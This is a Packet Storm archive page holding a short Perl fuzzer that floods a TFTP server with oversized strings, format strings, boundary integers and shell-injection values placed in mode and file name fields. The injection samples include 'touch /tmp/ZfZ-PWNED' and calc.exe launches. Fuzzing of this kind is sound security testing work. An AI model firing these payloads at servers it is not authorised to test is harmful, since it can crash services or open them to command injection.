what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

tftpfuzz.txt

tftpfuzz.txt
Posted Oct 30, 2008
Authored by Jeremy Brown | Site jbrownsec.blogspot.com

TFTP daemon fuzzer that uses Net::TFTP.

tags | fuzzer
SHA-256 | f0bb5b52d7d08ec8d250d4dc352452c02c79c428856b9235545fcf7730463f97
Download | Favorite | View

tftpfuzz.txt

Change Mirror Download
#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# TFTP Daemon Fuzzer.. remember to cpan Net::TFTP
# Wrote this up in about 10 minutes .. Bug on.

use Net::TFTP;
use Getopt::Std;

@overflow = ('A' x 600, 'A' x 1200, 'A' x 2200, 'A' x 4200, 'A' x 8200, 'A' x 11000,
             'A' x 22000, 'A' x 52000, 'A' x 110000, 'A' x 550000, 'A' x 1100000,
             'A' x 2200000, 'A' x 5500000, 'A' x 12000000, "\0x99" x 1200);

@fmtstring = ("%n%n%n%n%n", "%p%p%p%p%p", "%s%s%s%s%s", "%d%d%d%d%d", "%x%x%x%x%x",
              "%s%p%x%d", "%.1024d", "%.1025d", "%.2048d", "%.2049d", "%.4096d", "%.4097d",
              "%99999999999s", "%08x", "%%20n", "%%20p", "%%20s", "%%20d", "%%20x", 
              "%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%",
              "%n%n%n%n%n%n%n%n%n%n%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%d%d%d%d%d%d%d%d%d%d%s%s%s%s%s%s%s%s%s%s",
              "\0xCD" x 50, "\0xCB" x 50);

@numbers = ("0", "-0", "1", "-1", "32767", "-32768", "2147483647", "-2147483647", "2147483648", "-2147483648",
            "4294967294", "4294967295", "4294967296", "357913942", "-357913942", "536870912", "-536870912",
            "1.79769313486231E+308", "3.39519326559384E-313", "99999999999", "-99999999999", "0x100", "0x1000",
            "0x3fffffff", "0x7ffffffe", "0x7fffffff", "0x80000000", "0xffff", "0xfffffffe", "0xfffffff", "0xffffffff",
            "0x10000", "0x100000", "0x99999999", "65535", "65536", "65537", "16777215", "16777216", "16777217", "-268435455");

@miscbugs = ("~!@#$%^&*()-=_+", "[]\{}|;:,./<>?\\", "<<<<<<<<<<>>>>>>>>>>", "\\\\\\\\\\//////////", "^^^^^^^^^^^^^^^^^^^^",
             "||||||||||~~~~~~~~~~", "?????[[[[[]]]]]{{{{{}}}}}((())", "test|touch /tmp/ZfZ-PWNED|test", "test`touch /tmp/ZfZ-PWNED`test",
             "test'touch /tmp/ZfZ-PWNED'test", "test;touch /tmp/ZfZ-PWNED;test", "test&&touch /tmp/ZfZ-PWNED&&test", "test|C:/WINDOWS/system32/calc.exe|test",
             "test`C:/WINDOWS/system32/calc.exe`test", "test'C:/WINDOWS/system32/calc.exe'test", "test;C:/WINDOWS/system32/calc.exe;test",
             "/bin/sh", "C:/WINDOWS/system32/calc.exe", "¶§¼½¿", "%0xa", "%u000", "/" x 200, "\\" x 200, "-----99999-----", "[[[abc123]]]", "|||/////|||");

getopts('h:', \%opts);
$host = $opts{'h'};

if(!defined($host))
{
     print "\n                  TFTP - TFTP Server Fuzzer";
     print "\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]";
     print "\n                  Usage: $0 -h <host>\n\n";
     exit(0);

}

print "\nFuzzing [TFTP]->[MODE/GET] STAGE #1 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->get("test", "test");
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->get("test", "test");
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->get("test", "test");
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->get("test", "test");
}
sleep(1);

print "\nFuzzing [TFTP]->[MODE/PUT] STAGE #2 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->put("test", "test");
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->put("test", "test");
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->put("test", "test");
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => $fuzz);
$tftp->binary;
$tftp->put("test", "test");
}
sleep(1);

print "\nFuzzing [TFTP]->[GET/ASCII/NETASCII] STAGE #1 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);

print "\nFuzzing [TFTP]->[GET/ASCII/OCTET] STAGE #2 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->get($fuzz, "test");
}
sleep(1);

print "\nFuzzing [TFTP]->[GET/BINARY/NETASCII] STAGE #3 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);

print "\nFuzzing [TFTP]->[GET/BINARY/OCTET] STAGE #4 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->get($fuzz, "test");
}
sleep(1);

print "\n\nFuzzing [TFTP]->[PUT/ASCII/NETASCII] STAGE #1 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);

print "\nFuzzing [TFTP]->[PUT/ASCII/OCTET] STAGE #2 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->ascii;
$tftp->put("test", $fuzz);
}
sleep(1);

print "\nFuzzing [TFTP]->[PUT/BINARY/NETASCII] STAGE #3 COMPLETE...";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host);
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);

print "\nFuzzing [TFTP]->[PUT/BINARY/OCTET] STAGE #4 COMPLETE...\n\n";
foreach(@overflow)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@fmtstring)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@numbers)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);
foreach(@miscbugs)
{
$fuzz = $_;
$tftp = Net::TFTP->new($host, Mode => "octet");
$tftp->binary;
$tftp->put("test", $fuzz);
}
sleep(1);

exit;
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close